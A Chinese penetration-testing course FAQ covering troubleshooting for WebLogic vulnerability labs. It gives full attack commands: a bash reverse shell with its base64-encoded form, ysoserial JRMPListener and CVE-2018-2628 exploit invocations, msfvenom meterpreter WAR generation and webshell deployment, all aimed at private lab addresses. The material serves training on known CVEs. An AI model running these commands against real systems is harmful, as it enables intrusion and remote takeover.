课程问题
【汇总】刻录BadUSB问题-社会工程学
Linux文件管理章节,排除exclude隐藏文件、查找不是以txt结尾的文件
Linux编辑模式如何恢复操作?
计算机网络-安装winPcap提示a newer version of WinPcap is already installed on this machine
MySQL表添加外键不生效
MySQL-phpMyAdmin登录失败
PHP代码在vscode不能执行
kali安装docker失败
CSRF漏洞学完了,怎么练习
kali apt安装软件提示:unable to locate package无法定位软件包
kali中beef-xss配置文件
msf安装viper炫彩蛇 docker-compose up -d 报错
【汇总】git信息泄露,githack利用不成功
【汇总】蚁剑antsword连接报错
Kioptrix Level 1靶机扫描不到IP
逆向课程吾爱破解工具包不能运行
【汇总】永恒之蓝漏洞/eternalblue/ms17-010复现不成功
跳板机发起攻击的问题
跳板机也会被追溯到吧,以为用访问日志和历史查看?
逆向课程,win10 64位的od 和IDA 在哪下?
vulnhub靶场prime1提权失败GLIBC问题
Linux git clone TCP connection reset by peer
ssrf与gopher与redis
CSRF靶场报错无数据库以及复现漏洞时金额不减少的问题
【汇总】SQL注入靶场sqli-labs连接/数据库初始化错误
sqli-labs靶场21关报错:mysqli_real_escape_string() expects parameter 1 to by mysqli, null given in
SQL注入floor报错注入原理
【汇总】SQL注入load_file不能读文件(secure_file_priv)
SQL注入 python盲注脚本出现了多余错误的字符
Kali——SQL注入的school靶场怎么搭建?
在使用sqlmap时,明明有注入点,却sqlmap跑不出来,会是什么原因?
CNNVD漏洞分类指南旧网址打不开
msf编码免杀执行报错:No .text section found in the template
zenmap(nmap windows版本)下载地址
【汇总】安装运行oneforall报错
PHP代码提示 expects parameter 1 to be mysqli_result bool given in
安装xsser报错,pkgProblemResolver
安装CodeTest报错
【汇总】DVWA靶场报错
PHP报错C:\php\ext\php_mysqli.dll (找不到指定的模块)
java-jar启动报错找不到或无法加载主类
【汇总】文件上传漏洞upload-labs无法复现汇总
SSH Key后门免密登录
localhost和127.0.0.1的关系
Apache添加mod security模块后无法启动
fastjson JdbcRowSetImpl利用链,为什么会自动执行恶意代码
反弹连接命令的含义
【汇总】Redis客户端不能连接到Redis服务端,卡住、超时或者拒绝连接
【汇总】反弹连接不成功(Redis未授权访问漏洞)
PAM依据什么找到服务对应的配置文件?
【汇总】文件上传漏洞upload-labs靶场无图片、无样式,打开关卡404
【汇总】Apache启动失败
【汇总】Fastjson复现失败总结和思路
免杀课程上的有溢出漏洞360版本在哪下
awvs web网站打不开
【汇总】vulhub靶场无法启动/连接
浏览器的cookie文件保存在哪里
log4j无法修改日志等级问题,只有error触发漏洞
Charles抓包问题
useradd 参数 -p 指定密码登录失败
tar -rf 往gz 压缩包里面追加文件
SQL注入中如users表名显示的字段名过多
Redis连接成功,但执行命令时报错(error) DENIED Redis is running in protected mode
在渗透测试过程中,怎么判断一个web网站使用了struts
青花瓷插件版本(charles证书导入burp suite)
SRC基础抓包 - proxifier抓小程序包报错
sqli-labs使用group_concat查询时报错:在没有GROUP BY的聚合查询中,SELECT 列表的表达式#3包含非聚合列'security.users.password;这与sql_mode=only_full _group_by 不兼容
nessus 报错 UnicodeDecodeError: 'gbk' codec can't decode byte 0xa2 in position 6588: illegal multibyte sequence
灯塔 timeout of 12000ms
SUID提权find -p问题
信息收集搭建代理IP|快代理的使用|搭建代理池
Webgoat Java源代码审计靶场问题汇总
XSS课程sendmail收不到邮件
SUDO权限配置不成功
beef-xss启动失败
centos7替换yum源为阿里云报错正在连接 mirrors.xxx | 127.0.0.2|:80... 失败:拒绝连接。
交换互联互通基础-实验:三层网关通信 配置失败问题
cmd运行.py文件,会自动弹出pycharm
永恒之蓝漏洞run vnc没有反应
sed删除两个特定字符中间的内容
sqli-labs靶场报错group_concat does no exist
RuoYiv4.7.1启动报错java: 程序包io.swagger.annotations不存在
type-poc.php运行报错unexpected T_PAAMAYIM_NEKUDOTAYIM
typecho反序列化漏洞复现失败问题
安卓模拟器openssl转换burp证书报错
计算机网络-网络协议分析-威胁数据流实战Bravo-1.pcapng流量分析答案
打开了php.ini搜索magic_quotes_gpc = On找不到
获取windows保存的明文WiFi密码
反序列化工程serialize-vul只能查看.class不能查看.java源码
【汇总】codereg.py-ddddocr启动/识别问题
【汇总】shiro反序列化(包括内存马)复现问题
【汇总】pikachu-XSS后台-pkXss报错复现不成功
域控和域管理员有啥区别
csrf靶场bank登录出现404错误
PHP代码审计-bluecms靶场搭建
"echo PHP_EOL"查了是换行符的意思,但运行完却没有换行
思科路由器ip地址调试界面问题
【汇总】log4j漏洞复现不成功-原因和排查思路
MySQL约束不生效,插入数据不报错
sqlmap --os-shell失败 无写入权限
MYSQL80:ERROR 1045 (28000):解决方法
MYSQL:绕过权限验证存在的问题(mysqld --console --skip-grant-tables --shared-memory)
vmware workstation虚拟机列表没有“共享的虚拟机”
vulnhub-dc9-端口敲门以后无法连接
docker拉取镜像失败pulling fs layer
【汇总】Weblogic漏洞复现问题
xss-labs第14关不显示
计算机网络课程-子网划分答案
sqlmap执行POST注入的两种方式
逆向课程开发工具vs2008 vc6.0
sqli-labs靶场第21关cannot modify header information -headers错误
Cannot resolve plugin org.apache.maven.plugins:maven-resources-plugin:3.2.0
msi宏病毒,双击xlsm文件没有上线
【汇总】综合信息收集工具hbit运行相关问题
解决自建wooyun系统无法使用搜索功能
【汇总】easyocr运行报错
w8fuckcdn运行文件报错
执行net view报错6118
浏览器打开PHP文件显示源代码,没有运行代码
安装jwt-cracker报错idealTree:lib: sill idealTree buildDeps
burp插件HAE相关问题
Linux配置Java/JDK(Kali启动JRMPListener报错)
esedbexport工具的github地址已经失效
beef-xss报错in `require`: cannot load such file -- msgpack(LoadError)
【汇总】yum安装MySQL,mysql -uroot -p临时密码无法登录
灯塔ARL报错timeout of 12000ms exceeded
httpconn暴破dvwa第一个密码0000提示破解成功
【汇总】访问jsp文件报错:HTTP500内部服务器错误,无法编译为JSP类
【汇总】sqlmap运行报错
powershell脚本运行问题
【汇总】API漏洞-crapi靶场问题
Excel无法在未启用宏的工作簿中保存以下功能
CVE-2020-16848 SaltStack命令注入返回406 Not acceptable
【汇总】IDEA-Tomcat项目访问页面404,找不到localhost的网页
python2安装Crypto库报错
安装Typecho无法连接数据库Database Server Error
find -name加引号和不加引号的区别
【汇总】Docker逃逸问题-CVE-2019-5736-CVE漏洞复现
XXE漏洞,不能读取本地文件
vulnhub-breach1-war包报错
Apache Commons Collections调用链路
log4j工程unboundid依赖报错
【汇总】内存马AgentDemo工程报错
vulnhub-prime靶机显示异常
Shiro反序列化漏洞原理解释
内存马课程小马xiaoma.jsp上传文件失败
vulhub-log4j漏洞复现流程
【汇总】CVE-2021-31805-struts2 s2-062漏洞复现失败
安卓逆向手机选择
【汇总】WinRAR代码执行漏洞CVE-2023-38831
vulnhub靶机扫描不到ip地址
kill -9 杀不死ping baidu进程的问题
【汇总】CVE-2022-22947-Spring Cloud Gateway RCE(SpEL表达式)
XSS课程中存储型XSS靶场无法注册
XSS课程资料代码怎么使用
CVE-2018-12613-phpMyAdmin4.8.x文件包含漏洞
本文档使用 MrDoc 发布
-
+
首页
【汇总】Weblogic漏洞复现问题
课程:中间件-Weblogic漏洞 MacOS复现参考(学员“暂无”编写): https://juejin.cn/post/7356447891822575625 # 问题1:7001打开是Error 404--Not Found ![](/media/202404/2024-04-09_093557_6293820.9186599419098554.png) 解决办法: 在后面加上console,初始化一次 x.x.x.x:7001/console # 问题2:CVE-2014-4210-SSRF Redis无法启动 解决办法参考: https://blog.csdn.net/weixin_43886198/article/details/111144854 CVE-2014-4210-SSRF漏洞复现 https://cloud.fynote.com/share/d/r0UfRAjG # 问题3: CVE-2018-2628-T3协议反序列化漏洞,复现失败 (如果你对于为什么不直接发反弹链接Payload有疑惑,看这个:https://wiki.bafangwy.com/doc/668/) 完整的利用流程: ## 1、Kali监听7777端口 ``nc -lvp 7777`` ## 2、准备反弹连接命令 把连接到kali的反弹连接命令,经过base64编码 网站:https://wiki.bafangwy.com/doc/401/ 原命令示例: ``bash -i >& /dev/tcp/192.168.142.162/7777 0>&1`` 转换后: `` bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xNjIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i} `` ## 3、启动JRMPListener Kali使用ysoserial.jar监听了本机8761端口,并且准备好反弹连接内容 `` java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8761 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xNjIvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}" `` ## 4、向靶机发送payload Kali攻击机使用cve-2018-2628-exp.py脚本连接靶机7001端口,并且让靶机去连接ysoserial启动的8761端口 ``python2 cve-2018-2628-exp.py 192.168.142.133 7001 ysoserial.jar 192.168.142.162 8761 JRMPClient`` ## 排查方法 如果复现不成功,就需要从以下几个方面进行排查: 1、靶机和攻击机(Kali)的IP,能相互ping通吗? 如果本身网络不通,肯定是有问题的 2、执行 exp.py以后,有没有成功连接到靶机? ![](/media/202403/2024-03-22_154524_8242020.24766050803974426.png) 如果没有成功,检查: <font color="red">1)运行cve-2018-2628-exp.py的命令是否有问题</font> <font color="red">2)网络连通性</font> 3、JRMPListener,8761端口,有没有收到来自靶机(如图中192.168.142.133)的请求? ![](/media/202403/2024-03-22_154425_3005510.0010984278436749761.png) 如果这一步没有成功,说明要么是靶机没有收到exp脚本发来的反序列化内容,要么是收到了反序列化内容,但是内容有误,所以无法去连接JRMPListener。 检查: <font color="red">1)网络连通性</font> <font color="red">2)启动JRMPListener的命令(包括反弹连接代码)是否有问题</font> 3、如果JRMPListener,8761端口,收到了来自靶机的请求,但是最后还是没有成功: 说明靶机已经请求了反弹连接的内容,但是最终反弹连接没有成功。 检查: <font color="red">1)网络连通性。可以直接在靶机执行``bash -i >& /dev/tcp/192.168.142.162/7777 0>&1``,验证是否可以连接成功。如果直接运行不成功,利用漏洞去连接肯定不会成功。</font> <font color="red">2)反弹连接的代码是否有问题(比如格式、IP、端口错误)?</font> <font color="red">3)启动Docker靶场的时候,不要加``-d``参数,这样就可以看到服务端输出的日志,根据日志显示内容排查错误</font> 其他解决办法: `docker-compose down` 移除靶场,再次启动试试,参考: https://www.mashibing.com/question/detail/106163 其他方法:尝试其他复现流程 https://blog.csdn.net/weixin_63960760/article/details/132837960 # 问题4:弱口令 MSF木马访问500错误 ![](/media/202403/2024-03-14_131201_5135040.9693087710616617.png) 首先,仔细对比课堂的操作流程: https://cloud.fynote.com/share/d/Hh7JAHNp3 ## 解决办法1:用kali2021 应该是kali里面的msf的版本过高的问题。用kali2021就可以成功。 ``` Kali 2021.3 下载: https://msb-netdisk.mashibing.com/share/225a36d734614cf98f58d2418ea7cf7a ``` 命令(修改为你监听的IP和端口): `msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.162 lport=4444 -f war -o java.war` 参考:https://www.mashibing.com/question/detail/96280 ## 解决办法2:使用冰蝎的JSP马链接成功 将冰蝎生成的shell.jsp文件,右键压缩成zip文件,然后将后缀改为`.war`,将war文件部署在webgoic上,使用冰蝎链接,反弹shell 参考:https://www.mashibing.com/question/detail/94720 # 问题5:弱口令 weblogic_decrypt.jar启动或解密报错 工具: https://github.com/KimJun1010/WeblogicTool ## 前提条件 1、Java版本必须是8 2、密文检查前后不能有空格 ## 错误1 异常:pad block corrupted ![](/media/202403/2024-03-11_205402_1710330.8630299576184142.png) ### 解决办法 重新保存文件: ![](/media/202403/2024-03-11_205257_5720540.8371520670254955.png) 方法由**周向东**同学提供,特此致谢。 ![](/media/202403/2024-03-15_174307_8776490.8965202946638576.png) ## 错误2 java.lang.Negative.ArraySizeException ![](/media/202312/2023-12-26_164031_8979630.032175619490364626.png) ### 解决办法 使用JDK8,删除密文中的空格 ## 错误3 MacOS下数据包的保存问题 参考: https://www.mashibing.com/question/detail/97263 ## 错误4 关联问题 https://www.mashibing.com/question/detail/80713 ### 错误信息 Exception in thread "AWT-EventQueue-0" java.lang.NoClassDefFoundError: org/bouncycastle/jce/provider/BouncyCastleProvider ![](/media/202309/2023-09-08_161159_8179640.34289078025611675.png) ### 错误原因 由于bcprov jar包签名问题,所以首次解密会出现异常:PBEWITHSHAAND128BITRC2-CBC SecretKeyFactory not available。 ### 解决办法 需要手动下载 https://repo1.maven.org/maven2/org/bouncycastle/bcprov-jdk15on/1.56/bcprov-jdk15on-1.56.jar 然后将文件存在本地安装的JDK路径下,例如 E:\Java\jdk1.8.0_60\jre\lib\ext # 问题5:CVE-2018-2894 任意文件上传-访问木马404 关联问题: https://www.mashibing.com/question/detail/100532 ![](/media/202405/2024-05-28_154100_5160870.4765709209477317.png) ## 问题原因: 漏洞地址: http://192.168.142.133:7001/ws_utc/config.do 修改工作目录 `/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css` >d 原因是:这里的工作目录后面多了一个空格!删除以后重新保存即可 # 问题6:CVE-2020-14882-RCE漏洞复现失败 仔细与复现流程对比: https://cloud.fynote.com/share/d/GjWNLHA1G 问题1:404错误 https://www.mashibing.com/question/detail/100582 这个问题的原因是poc.xml内容有问题: `>和&之间多了空格,删掉就解决了` ![](/media/202406/2024-06-05_160902_6259880.7894865108822567.png) 问题2: https://www.mashibing.com/question/detail/100789
无涯
2024年9月19日 14:30
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
分享
链接
类型
密码
更新密码